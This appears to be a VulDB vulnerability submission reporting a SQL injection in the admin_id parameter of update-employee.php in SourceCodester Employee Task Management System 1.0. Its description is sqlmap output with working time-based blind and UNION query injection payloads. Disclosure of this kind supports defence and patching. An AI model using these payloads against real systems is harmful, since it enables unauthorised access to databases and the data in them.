Submit #299168: SourceCodester Employee Task Management System v 1.0 SQL Injection in param admin_id in update-employee.phpinfo

TitleSourceCodester Employee Task Management System v 1.0 SQL Injection in param admin_id in update-employee.php
DescriptionSQL Injection in param admin_id in update-employee.php [20:40:26] [INFO] GET parameter 'admin_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [20:40:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [20:40:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [20:40:50] [INFO] target URL appears to be UNION injectable with 7 columns [20:40:51] [INFO] GET parameter 'admin_id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'admin_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests: --- Parameter: admin_id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: admin_id=28' AND (SELECT 9712 FROM (SELECT(SLEEP(5)))LThc) AND 'CUEh'='CUEh Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: admin_id=-3580' UNION ALL SELECT NULL,CONCAT(0x71786a7171,0x4d454655527a5759756977515963705172466b7571445763574e5955704353476273685474526846,0x71706b7171),NULL,NULL,NULL,NULL,NULL-- - ---
Source⚠️ https://github.com/tht1997/WhiteBox/blob/main/sourcecodester/update-employee.md
User
 huutuanbg97 (UID 45015)
Submission03/15/2024 14:44 (2 years ago)
Moderation03/16/2024 07:14 (16 hours later)
StatusDuplicate
VulDB entry257053 [SourceCodester Employee Task Management System 1.0 update-employee.php admin_id sql injection]
Points0

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!